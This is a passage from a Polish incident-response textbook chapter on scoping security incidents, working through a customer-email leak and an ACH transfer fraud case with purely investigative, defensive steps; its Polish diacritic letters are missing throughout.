informacji. Aby okreli zasig incydentu, zasadniczo naley przeprowadzi ograniczone ledztwo.
Aby byo jasne, co jest gwnym tematem tego rozdziau, pomyl o dochodzeniu policyjnym.
Jeeli dojdzie do kradziey w sklepie spoywczym, policja nie przesuchuje wszystkich osb znajdujcych
si w okrelonym promieniu od miejsca, w ktrym popeniono przestpstwo. Policjanci nie zajm te
wszystkich produktw pozostaych w sklepie w celu zdjcia odciskw palcw. Zamiast tego zgromadz
i przeanalizuj dowody pocztkowe. Wysuchaj zezna wiadkw albo przejrz nagrania z kamer
monitoringu. Na podstawie tych danych zdecyduj, co robi dalej mog np. przesucha wicej osb,
przejrze nagrania z jeszcze innych kamer albo zdoby nakaz rewizji. Czasami funkcjonariusze mog
stwierdzi, e nie da si dalej prowadzi dochodzenia, bo np. brak jakichkolwiek dowodw wstpnych.
Teraz zastanw si, jak okreliby zasig incydentu bezpieczestwa komputerowego. Mimo e
sprawa dotyczy komputerw, zastosowanie ma wiele zasad typowych dla zwykych dochodze. Dobry
specjalista postpuje zgodnie z tymi zasadami, poniewa s oglnie skuteczne w rozwizywaniu zagadek
kryminalnych. Jeli przykadowo dowiesz si, e pewien uytkownik otrzyma wiadomo e-mail
z wirusem, powiniene ustali dodatkowe fakty, np. kto jeszcze dosta tak wiadomo, w jakich dziaach
pracuj te osoby oraz kiedy zostay rozesane te e-maile. W rozdziale tym dzielimy si nasz wiedz
na temat stosowania tradycyjnych metod dochodzeniowych w kontekcie prowadzenia ledztw
w sprawach zwizanych z incydentami bezpieczestwa komputerowego. Najpierw opisujemy
podstawowe pojcia, a potem przedstawiamy sposoby ich wykorzystania na podstawie kilku scenariuszy.
Zanim rozpoczniemy
Opisane dalej w tym rozdziale scenariusze to prawdziwe zdarzenia, w sprawie ktrych

prowadzilimy ledztwa. Nie naley jednak doszukiwa si jakichkolwiek korelacji midzy
nimi a incydentami, jakie miay miejsce w jakiejkolwiek organizacji. Bardzo skrupulatnie
ukrylimy szczegy, ktre mogyby pozwoli kogo zidentyfikowa i wszystko pomieszalimy.
Jeli podczas lektury tego rozdziau dojdziesz do wniosku, e opisujemy incydent, ktry mia
miejsce w Twojej organizacji, pamitaj, e nie jeste sam podobne zdarzenia miay miejsce
w tylu organizacjach, e strach pomyle.
W opisach scenariuszy poruszamy zagadnienia, ktrych jeszcze nie opisalimy do tej pory.
W niektrych przypadkach przeprowadzilimy czynnoci w dziaajcym systemie. Wprawdzie
wspominalimy ju kilka razy o koncepcji reakcji na ywo, na razie nie przedstawilimy
adnych szczegw na ten temat. Jednak w tym rozdziale nie ma to wikszego znaczenia. Jeli
koniecznie chcesz ju teraz dowiedzie si, jak si to robi, przeczytaj najpierw dalsze rozdziay,
w ktrych opisalimy metody zbierania i analizowania danych, a potem wr do tego rozdziau.
ROZDZIA 6. OKRELANIE ZASIGU INCYDENTU 141
CO MAM ZROBI
W podrozdziale tym opisujemy podstawowe pojcia zwizane z pocztkowymi etapami prowadzenia
ledztwa, ktrych celem jest okrelenie zasigu incydentu i umoliwienie podjcia decyzji, co robi
dalej. Piszc sowo zasig, mamy na myli dowiadywanie si, co dokadnie zrobi haker, poniewa
wstpna analiza rzadko daje odpowiedzi na wszystkie pytania. Opisujemy trzy obszary dziaalnoci,
w wyniku ktrej powinno da si okreli zasig incydentu; s to:
analiza danych pocztkowych,
gromadzenie i przegld dowodw wstpnych,
okrelenie sposobu postpowania.
Dalej w rozdziale przedstawiamy kilka scenariuszy, na podstawie ktrych pokazujemy sposoby
zastosowania tych technik w praktyce. Czytajc dalej ten podrozdzia, pamitaj, e to jeszcze
nie wszystko. Zaczniemy od pierwszego obszaru dziaa analizy danych pocztkowych.
Analizowanie danych pocztkowych

W ramach zdarzenia wykrycia incydentu powinny zosta przekazane pewne informacje wstpne.
Jeli np. sprawa dotyczy ataku typu SQL injection, powinnimy zna dat, godzin oraz adresy IP
rdowy i docelowy. Ponadto powinno si porozmawia z pracownikami obsugujcymi system
wykrywania w celu sprawdzenia, czy udaoby si wydoby jeszcze jakie dodatkowe informacje.
Popytaj, czy s jeszcze inne systemy detekcji i co one wykrywaj oraz rejestruj mog istnie
systemy zawierajce bardzo cenne dane. Pamitaj, e administratorzy sieci mog myle inaczej ni
ledczy. Nie powinno si oczekiwa, e przeka nam wszystkie wane informacje, poniewa mog
nie wiedzie, co jest wane dla ledztwa.
Samo zdarzenie wykrycia incydentu rwnie nie powinno by jedynym rdem informacji.
Naley zebra fakty, aby dowiedzie si, jaki by kontekst wykrycia. Moesz np. otrzyma
informacj, e system w Twoim rodowisku poczy si z witryn internetow znan z tego,
i zawiera szkodliwe oprogramowanie. W odpowiedzi moesz odizolowa system, np. odczajc
go od sieci, i byby to dobry pierwszy krok. Dobrym pomysem jest te zdobycie wikszej iloci
informacji. Pomyl o podstawowych pytaniach zaczynajcych si od sw: kto, co, kiedy, gdzie,
dlaczego i jak. Kto jest uytkownikiem? W ktrym dziale pracuje? Czy kto z nim rozmawia?
Czy by wtedy przy komputerze? O ktrej godzinie i ktrego dnia doszo do incydentu? Jaka to
bya strona internetowa? Czy jest to dobrze znany serwis? Jakie informacje zostay przesane?
Ile informacji zostao przesanych? Jakie dane wysano lub pobrano? Czy po tym zdarzeniu
wykryto jakie inne nietypowe zdarzenia? Odpowiedzi na takie pytania mog mie duy wpyw
na Twoje dalsze postpowanie.
Po przeanalizowaniu danych pocztkowych naley zdecydowa, jakie dowody pocztkowe
s potrzebne i co si z nimi zrobi.
Zbieranie i analiza dowodw pocztkowych

Celem tego etapu jest znalezienie rde dowodw pocztkowych oraz zdecydowanie, ktrych
z nich uy. Pniej naley zebra materia dowodowy i go przeanalizowa. Naley znale takie
rda dowodw, ktre dostarczaj szybkich odpowiedzi. Najlepiej dotrze do rde nalecych
do rnych kategorii i niewymagajcych duego wysiku, aby je przeanalizowa. Jeeli np. w ramach
ledztwa szukasz odpowiedzi na pytanie, czy w systemie zosta uruchomiony szkodliwy program,
moesz rozway nastpujce rda materiau dowodowego.
Artefakty tworzone w systemie bezporednio przez szkodliwy program, np. pliki lub klucze
rejestru.
Artefakty systemu operacyjnego, np. skadniki pobierane przez system Windows
z wyprzedzeniem, ktre s ladami porednimi.
Artefakty aplikacji, np. histori przegldanych stron przegldarki internetowej
albo narzdzia do monitorowania liczby uruchomionych programw.
Artefakty sieciowe, takie jak dzienniki zapory sieciowej, w ktrych mog by zapisane
rejestry pocze internetowych.
Te cztery rda nazywamy niezalenymi rdami dowodw. Przykadowo istnienie dziennikw
zapory sieciowej, ktre mog zawiera spis pocze sieciowych wykonywanych przez szkodliwy
program, nie jest zalene od obecnoci jakiegokolwiek klucza rejestru i odwrotnie. Im wicej
niezalenych rde wykorzystasz, tym wiksz masz szans na wycignicie waciwych wnioskw.
Rozwiniemy troch ten temat, poniewa jest to bardzo wane na pocztkowych etapach
prowadzenia ledztwa.
Korzystajc ze rde niezalenych, zwikszasz szans na wykrycie ewentualnego uruchomienia
szkodliwego programu. Uwaamy tak z kilku powodw. Hakerowi trudniej usun lub zmodyfikowa
dowody we wszystkich miejscach, ktre s od siebie niezalene. A majc kilka niezalenych rde
informacji, mona porwnywa dane, np. dokadny czas wystpowania zdarze. Jeli s one zbiene,
niezalenie od tego, czy ustalenia s pozytywne, czy negatywne, wnioski wysnute na ich podstawie
s bardziej wiarygodne.
Jeeli rda s zalene od siebie nawzajem lub nale do jednej kategorii, np. elementw
pobieranych z wyprzedzeniem przez system Windows, szansa wykrycia jest mniejsza. System Windows
moe np. wykrywa pliki do pobrania z wyprzedzeniem w ramach normalnego procesu zarzdzania
plikami. rda dowodw z jednej kategorii czsto nie pozwalaj na wycignicie ostatecznych
wnioskw, poniewa powstaje zbyt wiele alternatywnych teorii, ktrych nie da si wykluczy.
Po zidentyfikowaniu rde i zgromadzeniu danych naley przeprowadzi analiz zdobytego
materiau. Kada minuta to okazja dla hakera na poczynienie dalszych szkd w systemie. Dlatego
naley stosowa metody analityczne pozwalajce jak najszybciej uzyska wyniki. Ponadto powinno
si przeprowadzi szybkie testy pozwalajce sprawdzi, czy metoda analizy jest szybka i dokadna.
Jeli przykadowo chcesz poszuka w dziennikach zapory sieciowej okrelonego adresu IP, powiniene
najpierw przeprowadzi drobny test np. poszuka informacji w danych z tylko jednego dnia.
Test ten pozwoli Ci zorientowa si, ile czasu potrwa wykonywanie normalnego zapytania, i na tej
podstawie stwierdzisz, czy metoda ta jest akceptowalna.
Ponadto mona sprawdzi dokadno metody przy uyciu adresu, o ktrym wiadomo,
e powinien zosta znaleziony. Bardziej szczegowy opis metod analitycznych zamiecilimy
w rozdziaach od 11. do 16.
Ostrzeenie Jak ju wczeniej pisalimy, nieobecno dowodu nie jest dowodem na nieobecno. System,
w ktrym wykryto pierwsze lady szkodliwej aktywnoci, moe by jedynym dotknitym
systemem lub jednym z setek dotknitych systemw. Moliwe, e udao si wykry hakera,
ktry dopiero prbuje wama si do rodowiska, albo proceder, w ramach ktrego z systemu
ukradziono ju wiele gigabajtw danych. Nie jestemy paranoikami, ale uwaamy, e nie
naley z gry zakada, i nic zego si nie stao tylko dlatego, e na razie nie ma na to
dowodw. Dowiadczenie podpowiada nam, e tego rodzaju zaoenia s jedn z gwnych
przyczyn niewykrycia wama przez dugi czas.
Okrelanie sposobu dziaania

Po zgromadzeniu i przeanalizowaniu dowodw wstpnych naley podj decyzj, jakie kolejne
kroki podj. Najczciej na tym etapie wybiera si metod przechowywania materiau
dowodowego, a take metody pozorowania i ograniczania zasigu incydentu. Jak zawsze,
gdy podejmuje si wan decyzj, naley rozway kilka czynnikw. Uwaamy, e w procesie
okrelania zasigu incydentu pomocne jest odpowiedzenie sobie na nastpujce pytania.
Czy dana czynno pomoe odpowiedzie na ktre z pyta postawionych w ramach
ledztwa?
Czy dana czynno pozwoli szybko znale odpowied?
Czy dziaam na podstawie materiau dowodowego?
Czy zbyt duo uwagi powicam na weryfikacj jednej teorii?
Czy wykorzystuj wiele niezalenych rde materiau dowodowego?
Czy zdaj sobie spraw, ile pracy trzeba wykona?
Czy jestem obiektywny?
Czy badam najwczeniejsze i najwiesze dowody wamania?
Czy odkryem co, co wymaga natychmiastowej reakcji?
Jako e nie ma jedynego najlepszego sposobu na podjcie decyzji ani idealnej metody
postpowania pozwalajcej rozwiza spraw, postanowilimy zilustrowa proces na podstawie
opisu dwch scenariuszy. W kadym z nich przedstawiamy sensowny wynik ledztwa i jedn lub
wicej cieek, ktre s problematyczne. Chcielimy w ten sposb pokaza zarwno waciwe,
jak i niewaciwe wzorce postpowania oraz przedstawi rozumowanie, ktre nas do nich
doprowadzio. Poniewa tematem tego rozdziau jest okrelanie zasigu incydentu, w scenariuszach
tych opisujemy tylko aspekty ledcze. Natomiast kwestie naprawy i przywracania normalnej
sprawnoci systemu omawiamy w rozdziaach 17. i 18.
WYCIEK DANYCH KLIENTW

W tym przypadku pracujemy w dziale bezpieczestwa IT duego sklepu internetowego. Do firmy
wpywa zwikszona ilo skarg na spam w wiadomociach e-mail. Nowi klienci al si, e po
zaoeniu konta w sklepie otrzymuj due iloci niechcianej poczty. Scenariusz ten jest mniej
konkretny ni inne, poniewa nie ma w nim adnych prawdziwych alarmw ani innych ladw
wystpienia problemw z bezpieczestwem. Niemniej jednak konsternacja ronie i dzia IT zostaje
poproszony o zbadanie sprawy.
Zaczniemy od przeanalizowania danych pocztkowych. Jako e dane pocztkowe dotyczce
sprawy pochodz ze skarg klientw, stwierdzasz, e potrzebujesz czego konkretniejszego, aby
potwierdzi podejrzenia. Jedn z moliwoci jest poproszenie klientw o pokazanie wiadomoci
e-mail. Pomys ten budzi jednak wtpliwoci natury praktycznej i prawnej, wic lepiej go porzuci.
Lepszym rozwizaniem jest utworzenie faszywych kont klientw z nowymi adresami e-mail. Zatem
postanawiasz utworzy trzy konta, kade z innym adresem e-mail w innej domenie. Aby zmniejszy
ryzyko, e adresy te mogyby zosta odgadnite, generujesz nazwy uytkownika w postaci 64-bajtowych
losowych acuchw. Po utworzeniu kont zaczynasz obserwowa poczt, jaka przychodzi na zwizane
z nimi konta e-mail. W midzyczasie podejrzewasz, e dane w jaki sposb wyciekaj, wic zaczynasz
poszukiwania przecieku i przygotowujesz si na dalszy rozwj sytuacji.
W fazie gromadzenia i analizy wstpnego materiau dowodowego Twoj pierwsz czynnoci
jest sprawdzenie, gdzie przechowywane s dane klientw i w jaki sposb s obsugiwane.
Zaczynasz od znalezienia baz danych zawierajcych adresy e-mail klientw. Jeeli adresy te s
wykradane, powinny by pobierane wanie z tych baz. Dowiadujesz si, e s dwie bazy danych,
jedna wewntrzna i jedna zewntrzna. Baza wewntrzna to serwer produkcyjny wykorzystywany
do prowadzenia normalnej dziaalnoci. Baza zewntrzna naley do obcej firmy marketingowej
i jest wykorzystywana gwnie do prowadzenia kampanii promocyjnych.
Aby zdoby wicej informacji, przeprowadzasz rozmowy z pracownikami z wewntrznego
dziau IT i wacicielami firmy. Chcesz dowiedzie si, jaki to rodzaj bazy danych i jaki ma ona
rozmiar, jakie jest przyblione natenie ruchu, kiedy bya ostatnia aktualizacja rekordw i kto j
wykona, gdzie s przechowywane kopie zapasowe oraz hak i kiedy przesyane s rekordy do
zewntrznej firmy marketingowej. Dowiadujesz si nastpujcych rzeczy.
System baz danych klientw to popularny produkt komercyjny z zaawansowanymi
funkcjami monitorowania zapyta i generowania raportw.
Rozmiar bazy danych wynosi okoo 500 GB.
Ruch sieciowy zwizany z t baz to okoo 3 TB dziennie.
Rekordy klientw s aktualizowane bezporednio przez witryn firmow lub rcznie przez
pracownika pomocy technicznej na telefon.
Nie ma adnego innego sposobu na zaktualizowanie rekordw klientw.
Kopie zapasowe s przechowywane zarwno w siedzibie, jak i poza ni, w jednej z innych
posiadoci firmy.
Firma marketingowa otrzymuje dane na koniec miesica nastpujcego po aktualizacjach.
Informacje te pozwalaj na poczynienie pewnego postpu, mimo braku prawdziwych dowodw.

Jest mao prawdopodobne, aby do wyciekw dochodzio w firmie marketingowej, poniewa
ze skarg klientw wynika, e spam otrzymuj wczeniej ni firma marketingowa ich dane.
Kradzie rekordw klientw dzwonicych do pomocy technicznej rwnie wydaje si mao
prawdopodobna. Dlatego ledztwo powinno skupi si na witrynie internetowej.
Ruch do bazy danych jest duy, wic ewentualne przechwytywanie pakietw sieciowych
moe by trudne. Jako e baza danych zapewnia zaawansowane funkcje monitorowania
zapyta, do analizy sposobu jej wykorzystania lepiej bdzie uy wanie tych funkcji.
W tym momencie nadal czekasz, aby dowiedzie si, czy w skrzynkach pocztowych powizanych
z faszywymi kontami pojawi si spam. W trakcie oczekiwania zastanawiasz si nad dodatkowymi
tropami i prbujesz snu domysy. Przykadowo kilku dyrektorw pyta, czy mogaby to by
sprawka kogo z wewntrz albo czy kto mg zmieni kod w witrynie, aby wysya hakerom kopie
adresw e-mail klientw lub wykonywa kopi tam do przechowywania kopii zapasowych. Cho
teorie te s moliwe, na razie nie masz adnych informacji, ktre pozwalayby potwierdzi lub
wykluczy jedn z nich. Nie ma te podstaw do tego, by powici ktrejkolwiek wicej uwagi.
Mona za to wykona kilka atwych dziaa, ktre pozwol wykluczy pewne teorie. Mona np.
wprowadzi dane klienta bezporednio do bazy danych, zamiast za porednictwem strony
internetowej. Jeli na tak wprowadzony adres nadal bdzie przychodzi spam, zdobdziesz dowody
wskazujce, e przyczyna wycieku nie tkwi w stronie internetowej. Jeli chodzi o tam do
przechowywania kopii zapasowych bazy danych, mona poprosi kogo z dziau IT, aby utworzy
dodatkow kopi zawierajc rekordy klientw nienalecych do produkcyjnej bazy danych.
I w kocu, jeli chodzi o ewentualn dziaalno kogo z wewntrz, na razie nie ma rozsdnej
moliwoci zweryfikowania tego tropu, cho dobrym pomysem byoby utworzenie listy kont
majcych dostp do bazy danych klientw.
Po dwch tygodniach oczekiwania na kontach e-mail faszywych klientw zaczyna pojawia si
spam. Wiadomoci przychodz szybko: w cigu dwch dni na kadym koncie jest ich ju po 20
i wszystkie maj bardzo podobn tre. Dodatkowo otrzymujesz spam na adres e-mail zwizany
z kontem rcznie wprowadzonym do bazy danych, co sugeruje, e strona internetowa nie gra tu
adnej roli. Ponadto nie ma ladw spamu w skrzynkach zwizanych z kontami utworzonymi
na tamach kopii zapasowych, co sugeruje, e tamy te take nie s rdem wycieku.
Ze zdobytych informacji wynika, e najbardziej prawdopodobn przyczyn wycieku jest
bezporedni nieuprawniony dostp do bazy danych. Haker mg zainstalowa na serwerze baz
danych wirus albo moe czy si z t baz przez sie. S dwa sposoby na monitorowanie zapyta
poprzez przechwytywanie pakietw sieciowych oraz przez monitorowanie za pomoc narzdzi
bazy danych i zapisywanie informacji w dziennikach. Jako e natenie ruchu sieciowego do bazy danych
jest bardzo due, wdroenie rozwizania przechwytujcego pakiety wymagaoby implementacji
wysokiej klasy systemu monitorujcego i byoby bardzo kosztowne. Poza tym, gdyby zapytania byy
szyfrowane lub haker czyby si z baz danych za pomoc wirusa zainstalowanego w systemie,
mogoby nie uda si atwo zdekodowa treci. W zwizku z tym dochodzisz do wniosku, e najlepszym
sposobem na zgromadzenie wikszej iloci dowodw bdzie wykorzystanie narzdzi do monitorowania
zapyta systemu baz danych. Przy okazji tworzysz kilka kolejnych faszywych kont klientw,
aby zdoby wicej danych na potrzeby ledztwa.
Przez kilka pierwszych dni po wczeniu monitoringu zapyta przegldasz dzienniki, aby
dowiedzie si, co wyglda na normaln dziaalno. Ponadto od administratorw baz danych
i aplikacji dowiadujesz si, gdzie dokadnie s przechowywane okrelone dane klientw. Mwic
dokadnie, sprawdzasz, czy istniej jakie zapytania lub procedury skadowane dokonujce
masowego eksportu profili klientw z adresami e-mail. Nie zauwaasz, aby co takiego miao
miejsce codziennie, wic liczysz, e gdy haker wykona podobne zapytanie do bazy danych, bez
trudu to wykryjesz. Po dwch kolejnych tygodniach oczekiwania zaczynasz otrzymywa spam
na nowo utworzone konta. Pobierasz wic dzienniki zapyta z okresu od ostatniego przegldu do
momentu, kiedy zacze otrzymywa niechcian poczt. Szukasz w tych plikach interesujcego
Ci pola custemail. Znajdujesz tylko jedno zapytanie zawierajce taki acuch, ktre zostao
wykonane trzy dni temu. Pena tre tego zapytania SQL to: " select custemail from custprofile
where signupdate >= 2014-02-16". Pobiera ono adresy e-mail klientw, ktrzy zaoyli konta
16 lutego 2014 roku lub pniej. Jest to data sprzed okoo dwch tygodni i z grubsza zgadza si
z ostatni fal nowego spamu.
Analiza dziennikw wykazaa, e zapytanie zostao wykonane 17 lutego 2014 roku o godzinie
11:42 GMT z adresu IP komputera biurkowego nalecego do firmowego dziau graficznego,
cho wykorzystano w nim nazw uytkownika nalec do administratora baz danych z dziau IT.
Spotykasz si z dyrektorem dziau graficznego i pytasz, czy wykorzystuj do czegokolwiek adresy
e-mail klientw w ramach normalnej dziaalnoci. Dowiadujesz si, e dzia ten w aden sposb
nie kontaktuje si z klientami, ale czsto porozumiewa si drog e-mailow z kilkoma dostawcami
zewntrznymi.
W tym momencie masz ju wystarczajco duo wstpnych dowodw, aby nabra pewnoci,
e rzeczywicie istnieje problem, posiadasz dobre tropy i moesz zdecydowa, co robi dalej.
Najpierw jednak przypomnijmy sobie najwaniejsze informacje.
S dowody na to, e skargi uytkownikw otrzymujcych spam po rejestracji w sklepie
s uzasadnione.
Wstpnie zgromadzone dane sugeruj, e do kradziey dochodzi raz na dwa tygodnie
i wykradane s tylko adresy e-mail. Dane s pobierane bezporednio z produkcyjnej
bazy danych.
Zapytania do bazy danych s wysyane przez sie z komputera biurkowego nalecego
do dziau graficznego firmy. Dzia ten nie wykorzystuje w aden sposb adresw e-mail
klientw w ramach swojej normalnej dziaalnoci. Ponadto w zapytaniu wykorzystywana
jest nazwa uytkownika bazy danych naleca do administratora baz danych z dziau IT.
Teraz naley podj decyzj, co robi dalej. Na podstawie posiadanych informacji mona
wytypowa dwa rda dowodw, ktrych zdobycie mogoby umoliwi posunicie ledztwa do
przodu; s to produkcyjna baza danych i komputer z dziau graficznego. Na razie masz niewiele
tropw i mao danych, wic postanawiasz, e najlepszym rozwizaniem bdzie zdobycie wikszej
iloci szczegw. W odniesieniu do komputera grafikw postanawiasz:
wykona analiz na ywo;
utworzy obrazy pamici i dysku twardego na potrzeby ledztwa;
przepyta uytkownika, aby dowiedzie si nastpujcych rzeczy:

jak dugo korzysta z tego systemu;
czy zauway przy nim kogokolwiek nieuprawnionego;
czy system zachowuje si dziwnie;
czy system jest wczony przez ca dob, przez siedem dni w tygodniu.
W odniesieniu do serwera baz danych postanawiasz:
wykona analiz na ywo;
zabezpieczy wszystkie dzienniki zawierajce informacje o dostpie uytkownikw do bazy danych;
zabezpieczy wszystkie dzienniki zapyta;
zabezpieczy wszystkie dzienniki aplikacji i systemu.
Jako e gromadzeniem danych zajli si inni czonkowie zespou, Ty zaczynasz zastanawia si
nad tym, od czego zaczniesz badanie, gdy ju otrzymasz kopie. Wiesz ju, e zapytanie SQL zostao
wykonane z komputera z dziau graficznego 17 lutego 2014 roku o godzinie 11:42 GMT, wic najlepszym
posuniciem wydaje si sprawdzenie, kto by wwczas zalogowany. Ponadto interesuje Ci aktywno
sieciowa tego systemu w czasie, gdy doszo do wykonania zapytania. Jako e w sieci adresy IP s
przypisywane przez DHCP, musisz dowiedzie si, jaki by wtedy adres IP systemu, aby wiedzie,
czego szuka w dziennikach serwera proxy i zapory sieciowej. (Zwr uwag, e postanowilimy
zabezpieczy wszystkie dzienniki bazy danych zawierajce informacje o dostpie uytkownikw.
Nie zachowujemy tylko rekordw odnoszcych si do podejrzanego konta uytkownika).
Szczegowa analiza zawartoci komputera grafika pozwolia wykry obecno wirusa. Jest on
zainstalowany na stae i ma wiele funkcji, np. konsol zdaln, zdalny interfejs graficzny oraz moliwo
uruchamiania i zamykania procesw. Program ten czy si z adresem IP z obcego pastwa. Ponadto
dowody sugeruj, e wirus jest zainstalowany od prawie dwch lat. Brak jednak wystarczajcych danych,
aby wyjani, w jaki sposb zamano zabezpieczenia. Ostatnie kroki ledztwa s zatem nastpujce.
Przeszukujesz wszystkie komputery w przedsibiorstwie w poszukiwaniu wskanikw
zagroenia za pomoc hostowego narzdzia inspekcji. Sprawdzasz nazwy plikw,
klucze rejestru i inne cechy charakterystyczne wykrytego wirusa.
Szukasz w dziennikach zapory sieciowej ladw wskazujcych na infekcj innych
komputerw, czyli wymiany ruchu z adresem IP, z ktrym czy si wirus.
Uwaga W scenariuszu tym pado podejrzenie na osob z wewntrz. Moe zauwaye, e zagroenie z tej strony
postawilimy na tym samym, a moe troch niszym poziomie, ni inne teorie mimo e cz wstpnych
dowodw prowadzia do systemu wewntrznego. Niektrzy twierdz, e zagroenie ze strony
pracownikw jest wiksze, poniewa atwiej zaatakowa sie od rodka albo w mediach mwi, e to
powany problem. Jednak z naszego dowiadczenia wynika, e hakerzy czsto nie maj problemw
z dotarciem do wewntrznych systemw, cho ofiary rzadko si do tego przyznaj ze wstydu lub
z obawy przed konsekwencjami prawnymi. Ponadto odkrylimy, e ledztwa nadmiernie skupione
na dochodzeniu, kto to robi, przed zdobyciem odpowiedzi na pytanie, co dokadnie si dzieje,
czciej kocz si fiaskiem. Dlatego jeli nie ma przekonujcych dowodw wskazujcych na dziaalno
kogo z wewntrz, lepiej postpowa zgodnie z faktami i mie oczy szeroko otwarte.
Teraz przeanalizujemy kilka sposobw okrelania zasigu tego wydarzenia, ktre nie dayby
spodziewanego efektu.
Wyciek danych klientw

przykady niepoprawnego okrelania zasigu incydentu
Na pocztku tego scenariusza mielimy mao informacji, istniao zatem spore ryzyko, e podymy
niewaciwym tropem. Oto opis kilku takich nieprawidowych cieek postpowania.
Niemdra decyzja. Po otrzymaniu od klientw skarg sugerujcych, e doszo do kradziey
danych, podejmujesz decyzj, aby przeszuka wszystkie komputery w firmie w celu sprawdzenia,
czy zawieraj acuchy nalece do danych klientw. Podczas tej operacji pliki o rozmiarze
przekraczajcym pewn warto s dodatkowo katalogowane. Rozmiar plikw jest obliczany
na podstawie rozmiaru rekordw klienta.
Problem. Ten sposb postpowania byby dobrym posuniciem, gdybymy mieli wicej
informacji sugerujcych, e dane s przechowywane w systemie nalecym do naszego
rodowiska. Ponadto przyjlimy zaoenie, e z bazy danych za kadym razem pobierane s
wszystkie adresy e-mail klientw. Nic jednak na to nie wskazywao. Ponadto postpowanie
takie nie ma sensu z tego wzgldu, e pobieranie kompletnej listy stanowi due obcienie
dla bazy danych, systemu, w ktrym baza ta jest przechowywana, oraz cza internetowego.
Haker na pewno zastosowaby kompresj, aby zmniejszy rozmiar danych przynajmniej
dziesiciokrotnie. I w kocu przeszukanie tysicy komputerw w przedsibiorstwie,
dekompresja i dekodowanie danych oraz wykrycie faszywych alarmw wymagaoby bardzo
duo pracy. Dlatego takie rozwizanie mogoby by zastosowane wycznie jako ostatnia
deska ratunku.
Niemdra decyzja. ledztwo skupia si na tym, kto w firmie ma wystarczajc wiedz i dostp
do odpowiednich systemw, aby wykra informacje klientw. Sporzdzane i drobiazgowo
analizowane s profile wielu pracownikw. Dodatkowo kada osoba jest przewietlana pod
ktem tego, w jakim towarzystwie si obraca, skd pochodzi itd. W komputerach zostaj
zainstalowane programy do rejestrowania naciskanych klawiszy i robienia zrzutw ekranu.
Codziennie sprawdza si zapisy z kamer monitoringu pozwalajce stwierdzi, kiedy kada
osoba wchodzi do biura i kiedy z niego wychodzi.
Problem. Koncentracja na tym, kto to robi, czsto prowadzi do polowania na czarownice
zamiast normalnego ledztwa. Taki sposb postpowania moe narusza prywatno
pracownikw, mimo braku jakichkolwiek dowodw wskazujcych na ich udzia
w procederze.
Niemdra decyzja. Jako e dane klientw s przechowywane na serwerze baz danych,
zesp ds. zabezpiecze postanawia wykona obraz pamici tego serwera w celu jej
przeanalizowania. Czonkowie zespou podejrzewaj, e skoro dochodzi do kradziey
danych z serwera, musi by na nim zainstalowany wirus. A nawet jeli nie ma adnego
wirusa, to w pamici powinny by obecne jakie lady szkodliwej dziaalnoci.
Zesp skupia si na pamici, poniewa o wiele atwiej wykona jej obraz ni obraz dyskw
twardych. Ponadto jego czonkowie uwaaj, e wszystko, co dzieje si w systemie, musi
w pewnym momencie znale odzwierciedlenie w pamici dlatego nie ma koniecznoci
zapisywania zawartoci dyskw twardych. Wykonuj obrazy pamici codziennie i analizuj
je w poszukiwaniu ladw szkodliwych dziaa.
Problem. wiadome skierowanie wszystkich zasobw do badania jednego rodzaju dowodw
jest zym pomysem, niezalenie od tego, jak due zaufanie ma si do rda informacji.
OSZUSTWO W AUTOMATYCZNYM
SYSTEMIE ROZRACHUNKOWYM (ACH)
Tym razem przenosimy si do lokalnej sieci sklepw ze sprztem komputerowym. Jeste dyrektorem
dziau IT i kierownikiem ds. bezpieczestwa informatycznego. Dyrektor generalny wanie Ci
poinformowa, e otrzyma telefon z banku z informacj o zablokowaniu przelewu ACH na kwot
183 642,73 $. Przelew mia trafi na nigdy wczeniej nieuywane konto, ktre zostao oznaczone
przez bankowy system zapobiegania oszustwom. Z informacji udzielonych przez bank wynika, e
do wykonania przelewu wykorzystano internetowe konto bankowe dyrektora finansowego firmy.
Dyrektor ten twierdzi, e nie wykonywa adnego takiego przelewu. Dyrektor generalny potwierdza
wic, e transakcja jest nielegalna, i chce, aby dowiedzia si, jak doszo do tego incydentu.
Prac zaczynasz od przeanalizowania informacji dostarczonych przez bank.
danie wykonania przelewu zostao wysane przez internet z internetowego konta
dyrektora finansowego.
Kwota przelewu to 183 642,73 $.
danie wykonania przelewu wysano dzie wczeniej o godzinie 16:37 GMT5 (EST).
rdowy adres IP to publiczny internetowy adres IP Twojej firmy (adres zapory sieciowej).
Na podstawie tych wstpnych informacji zastanawiasz si, w jakich rdach poszuka
dowodw wstpnych. Bierzesz pod uwag dwie szerokie kategorie sie i host i na myl
nasuwaj Ci si dwa podstawowe rda informacji, czyli zapora sieciowa i laptop dyrektora
finansowego. Wiesz, e zapora przechowuje dzienniki przez okoo dwa tygodnie. Ponadto moesz
zdoby dane do analizy ledczej z laptopa dyrektora finansowego, np. wykona analiz na ywo
oraz zrzut pamici i dysku twardego. Jednak w gr wchodzi te moliwo zaangaowania innych
komputerw. Jako e ruch internetowy nie jest duy i mona szybko wyeksportowa dzienniki
zapory sieciowej, postanawiasz najpierw przejrze te dzienniki w poszukiwaniu pocze
z bankiem. To powinno pozwoli na ustalenie, ktre rda dowodw s najwaniejsze.
Eksportujesz wczorajsze dzienniki zapory sieciowej na swj komputer i rozpoczynasz wstpn
analiz. Wydaje Ci si, e najlepiej zacz od czasu w pobliu godziny wystpienia nieautoryzowanego
dania wykonania przelewu, poniewa aby je wysa, kto musia zalogowa si na konto.
Szukasz wic wszystkich pocze z adresem IP banku w obrbie godziny 16:00. Odkrywasz kilka
pocze na standardowym porcie HTTPS 443, ktre zostay wykonane midzy 16:10 a 16:48.
W rekordach dotyczcych tych pocze znajdujesz dwa wewntrzne adresy IP jeden naley
do komputera dyrektora finansowego, a drugiego nie rozpoznajesz od razu.
Na podstawie wstpnej analizy dziennikw zapory sieciowej planujesz dwie wane czynnoci.
Po pierwsze, jako e masz dowd na zwizek midzy nieautoryzowan transakcj a komputerem
dyrektora finansowego, chcesz zabezpieczy wszelkie dane z tego komputera, ktre mog by
istotne w ledztwie, a wic wyniki analizy na ywo, zawarto pamici oraz zawarto dysku
twardego. Musisz dziaa szybko, poniewa zdarzenie miao miejsce bardzo niedawno i jest dua
szansa, e w systemie zostao jeszcze duo ladw. Po drugie, odkrye jeszcze jeden adres IP,
z ktrego czono si ze stron internetow banku w mniej wicej tym samym czasie, w ktrym
doszo do prby wykonania przelewu, wic musisz dowiedzie si, co to za adres, a po ustaleniu
jego uytkownika podj odpowiednie kroki.
